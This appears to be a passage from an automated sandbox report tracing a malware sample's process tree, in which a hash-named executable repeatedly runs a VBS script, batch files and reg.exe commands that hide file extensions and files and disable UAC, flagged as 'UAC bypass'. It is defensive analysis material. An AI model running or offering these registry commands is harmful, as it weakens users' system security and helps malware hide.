        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        129⤵
        
        PID:4008
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        126⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1488
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        126⤵
        
        PID:4708
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        126⤵
        
        PID:3788
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DsUoUQoc.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        126⤵
        
        PID:2672
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        127⤵
        
        PID:4964
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        124⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1220
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        124⤵
        
        PID:1848
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        124⤵
        
        PID:3160
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZMsMwMMw.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        124⤵
        
        PID:3012
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        125⤵
        
        PID:4864
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        122⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:4440
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        122⤵
        
        PID:2344
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        122⤵
        
        PID:4384
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GWcMsgYk.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        122⤵
        
        PID:4636
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        123⤵
        
        PID:3204
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        120⤵
        
        PID:3892
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        120⤵
        
        PID:4516
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        120⤵
        UAC bypass
        Modifies registry key
        
        PID:4116
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eUQAQoMM.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        120⤵
        
        PID:4340
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        121⤵
        
        PID:436
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        118⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1512
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        118⤵
        Modifies registry key
        
        PID:3424
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        118⤵
        
        PID:548
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IEUAIMgQ.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        118⤵
        
        PID:4040
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        119⤵
        
        PID:656
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        116⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3444
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        116⤵
        
        PID:3264
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        116⤵
        UAC bypass
        
        PID:3996
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UcsMgwII.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        116⤵
        
        PID:4132
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        117⤵
        
        PID:956
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        114⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1612
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        114⤵
        
        PID:924
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        114⤵
        UAC bypass
        
        PID:4092
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bYscwocY.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        114⤵
        
        PID:4032
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        115⤵
        
        PID:3256
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        112⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3672
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        112⤵
        
        PID:2888
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        112⤵
        UAC bypass
        
        PID:2768
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\naMEAMYA.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        112⤵
        
        PID:3892
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        113⤵
        
        PID:2428
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        110⤵
        
        PID:1184
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        110⤵
        
        PID:4760
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        110⤵
        UAC bypass
        
        PID:4208
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nCooosMk.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        110⤵
        
        PID:440
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        111⤵
        
        PID:2236
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        108⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4648
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        108⤵
        Modifies registry key
        
        PID:4312
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        108⤵
        UAC bypass
        
        PID:2008
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EEUQsgws.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        108⤵
        
        PID:4360
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        109⤵
        
        PID:1480
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        106⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2428
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        106⤵
        Modifies registry key
        
        PID:1400
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        106⤵
        UAC bypass
        Modifies registry key
        
        PID:4260
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QGYogcMw.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        106⤵
        
        PID:1496
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        107⤵
        
        PID:3716
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        104⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3284
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        104⤵
        
        PID:4484
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        104⤵
        Modifies registry key
        
        PID:1836
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kMUAkwUM.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        104⤵
        
        PID:3424
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        105⤵
        
        PID:428
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        102⤵
        Modifies visibility of file extensions in Explorer
        
        PID:440
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        102⤵
        
        PID:816
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        102⤵
        UAC bypass
        Modifies registry key
        
        PID:336
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RSYcQUAY.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        102⤵
        
        PID:628
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        103⤵
        
        PID:3824
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        100⤵
        Modifies registry key
        
        PID:1520
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        100⤵
        
        PID:4960
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        100⤵
        UAC bypass
        
        PID:4276
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hUsEkYkI.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        100⤵
        
        PID:3240
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        101⤵
        
        PID:4796
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        98⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:1596
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        98⤵
        
        PID:1612
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        98⤵
        UAC bypass
        
        PID:3208
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hOgEgYUo.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        98⤵
        
        PID:4460
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        99⤵
        
        PID:2572
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        96⤵
        
        PID:3628
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        96⤵
        
        PID:940
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        96⤵
        UAC bypass
        
        PID:2516
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yIkUwkck.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        96⤵
        
        PID:2224
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        97⤵
        
        PID:1300
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        94⤵
        
        PID:1400
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        94⤵
        
        PID:2408
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        94⤵
        
        PID:408
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AkggQcMY.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        94⤵
        
        PID:3168
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        95⤵
        
        PID:3972
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        92⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2080
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        92⤵
        
        PID:2732
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        92⤵
        UAC bypass
        
        PID:2104
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GQsIMcgQ.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        92⤵
        
        PID:2888
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        93⤵
        
        PID:3548
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        90⤵
        
        PID:1864
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        90⤵
        
        PID:3748
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        90⤵
        UAC bypass
        Modifies registry key
        
        PID:2388
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UEEsQkcA.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        90⤵
        
        PID:3824
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        91⤵
        
        PID:1184
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        88⤵
        
        PID:3492
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        88⤵
        
        PID:3432
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        88⤵
        
        PID:2548
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xogsUggQ.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        88⤵
        
        PID:3084
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        89⤵
        
        PID:4560
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        86⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2692
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        86⤵
        
        PID:1104
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        86⤵
        
        PID:1616
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LygcQgQw.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        86⤵
        
        PID:4404
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        87⤵
        
        PID:1984
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        84⤵
        
        PID:1872
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        84⤵
        
        PID:1240
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        84⤵
        
        PID:4308
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lKgwsYQU.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        84⤵
        
        PID:4516
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        85⤵
        
        PID:768
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        82⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:3348
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        82⤵
        
        PID:5068
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        82⤵
        UAC bypass
        Modifies registry key
        
        PID:2392
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iCIcwsIU.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        82⤵
        
        PID:2180
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        83⤵
        
        PID:1248
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        80⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2732
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        80⤵
        
        PID:2860
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        80⤵
        
        PID:2236
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cKMMEIII.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        80⤵
        
        PID:780
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        81⤵
        
        PID:3448
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        78⤵
        
        PID:3532
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        78⤵
        
        PID:4616
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        78⤵
        UAC bypass
        Modifies registry key
        
        PID:4920
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YMsoQYUU.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        78⤵
        
        PID:3860
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        79⤵
        
        PID:4760
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        76⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3680
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        76⤵
        
        PID:1320
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        76⤵
        UAC bypass
        
        PID:4384
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lSgggQok.bat" "C:\Users\Admin\AppData\Local\Temp\1bf6dbbc0c685500e6f123ccddcc4bc5341885793ffface2959952f44598f4cf.exe""
        76⤵
        
        PID:5100
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        77⤵
        
        PID:4960
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        74⤵
        Modifies visibility of file extensions in Explorer
        
        PID:1292
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        74⤵
        
        PID:4284
        
        C:\Windows\SysWOW64\reg.exe
        
